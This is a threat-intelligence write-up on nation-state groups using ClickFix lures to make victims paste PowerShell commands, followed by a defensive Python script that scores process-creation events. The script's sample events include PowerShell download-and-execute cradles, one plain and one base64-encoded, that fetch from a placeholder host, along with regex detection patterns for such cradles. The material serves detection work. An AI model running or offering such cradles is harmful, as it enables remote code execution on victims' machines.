
From late 2024 through early 2025, state-sponsored threat groups from North Korea, Iran, and Russia began using a social engineering technique known as ClickFix to distribute malware.

These campaigns were attributed to TA427 (Kimsuky), TA450 (MuddyWater), TA422 (APT28), and a lesser-known group dubbed UNK_RemoteRogue. ClickFix, long popular among financially motivated cybercriminals, has proven effective enough that it is now being folded into nation-state malware operations. Rather than overhauling their tradecraft, these actors are swapping out their usual initial infection and execution stages for ClickFix's user-driven approach, in which the victim runs the first-stage command.

ClickFix lures victims into infecting their own systems: a page or message presents a fake security verification, CAPTCHA, or error fix and instructs the target to copy a command (typically a PowerShell one-liner) and paste it into a shell or the Run dialog. Because the user launches the command, no exploit or macro is needed and the initial execution looks like ordinary interactive activity. For instance, TA427 used spoofed meeting invitations to steer targets to attacker-controlled websites, where they were told to run PowerShell commands that started a chain ending in the installation of Quasar RAT. Similarly, TA450 disguised its campaign as a Microsoft security alert timed to Patch Tuesday, directing victims to install legitimate-looking remote monitoring and management software that was then used for surveillance and data theft.

These campaigns targeted sectors like defense, government, healthcare, and finance in regions including the Middle East, North America, and Europe. UNK_RemoteRogue leveraged compromised Zimbra servers to send fake emails containing links to PowerShell tutorials and scripts tied to the Empire C2 framework. The surge in ClickFix adoption by diverse state actors within a short period highlights its growing appeal. While not yet a standard tactic, it is likely we’ll see more threat groups testing or deploying ClickFix in the near future.
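Because the first stage of a ClickFix infection is a command the victim pastes into a shell, endpoint telemetry usually shows a PowerShell process spawned from an interactive parent such as explorer.exe with a hidden window and a download-and-execute or encoded command line. The script below is an added example (not code from the article or from any of the groups it describes) that scores Sysmon-style process-creation records for those traits; the event records, indicator weights and threshold are constructed assumptions, and the -EncodedCommand payload is decoded (base64 of UTF-16LE) so an encoded cradle is not missed.

```python
"""Heuristic detection of ClickFix-style, user-pasted PowerShell one-liners.

Added example, not code from the article or the threat groups it covers.
Scores Sysmon-style process-creation events; all events below are constructed.
"""
import base64
import re

# Interpreters a ClickFix lure tells the victim to paste the command into.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Parents typical of a human pasting into the Run dialog or a terminal,
# rather than a scheduled task, installer or management agent.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}
INTERACTIVE_WEIGHT = 2

# (pattern, weight, label). Weights and threshold are assumptions tuned to the samples.
INDICATORS = [
    (re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"-(?:e|ec|en|enc|encodedcommand)\b", re.I), 2, "encoded command"),
    (re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget)\b", re.I), 2, "download cradle"),
    (re.compile(r"downloadstring|downloadfile|downloaddata", re.I), 3, "download cradle"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 3, "in-memory execution"),
    (re.compile(r"-(?:nop|noprofile)\b", re.I), 1, "no profile"),
    (re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), 1, "execution policy bypass"),
    (re.compile(r"https?://", re.I), 1, "remote URL"),
]
THRESHOLD = 4

ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload (base64 of UTF-16LE text), or '' if none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(event):
    """Return (score, labels) for one process-creation event.

    Only shell images are scored. The decoded -enc payload is scanned along
    with the raw command line, since encoding hides the cradle from plain matching.
    """
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in SHELLS:
        return 0, []
    text = event["CommandLine"] + "\n" + decode_encoded_command(event["CommandLine"])
    score, labels = 0, []
    if parent in INTERACTIVE_PARENTS:
        score += INTERACTIVE_WEIGHT
        labels.append("interactive parent " + parent)
    for pattern, weight, label in INDICATORS:
        if pattern.search(text):
            score += weight
            if label not in labels:
                labels.append(label)
    return score, labels


def flag_events(events):
    """Return the events whose score meets THRESHOLD, with score and reasons."""
    hits = []
    for ev in events:
        score, labels = score_event(ev)
        if score >= THRESHOLD:
            hits.append({"pid": ev["ProcessId"], "score": score, "reasons": labels})
    return hits


# Constructed Sysmon-style (Event ID 1) records for illustration, not real telemetry.
_ENC_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')".encode("utf-16-le")
).decode()
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    {   # ClickFix: victim pasted a download cradle into the Run dialog
        "ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
        "CommandLine": 'powershell.exe -w hidden -nop -ep bypass -c "iex (iwr http://example.invalid/verify.ps1 -UseBasicParsing).Content"',
    },
    {   # ClickFix variant with the cradle hidden behind -enc
        "ProcessId": 4188, "ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
        "CommandLine": "powershell.exe -enc " + _ENC_PAYLOAD,
    },
    {   # Benign: an admin checking processes from a terminal
        "ProcessId": 5012, "ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
        "CommandLine": "powershell.exe -NoProfile -Command Get-Process",
    },
    {   # Benign: management agent running a local script
        "ProcessId": 5240, "ParentImage": r"C:\Windows\CCM\CcmExec.exe", "Image": _PS,
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
    },
]

if __name__ == "__main__":
    for hit in flag_events(SAMPLE_EVENTS):
        print(hit)
```

The interactive parent is scored as one signal rather than used as a gate, so a cradle launched by a non-interactive parent still surfaces on the strength of the command line alone, while an ordinary explorer-spawned `Get-Process` stays below the threshold. In production the same logic would read Sysmon Event ID 1 or EDR process-start events and would want allow-listing for known administrative scripts.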
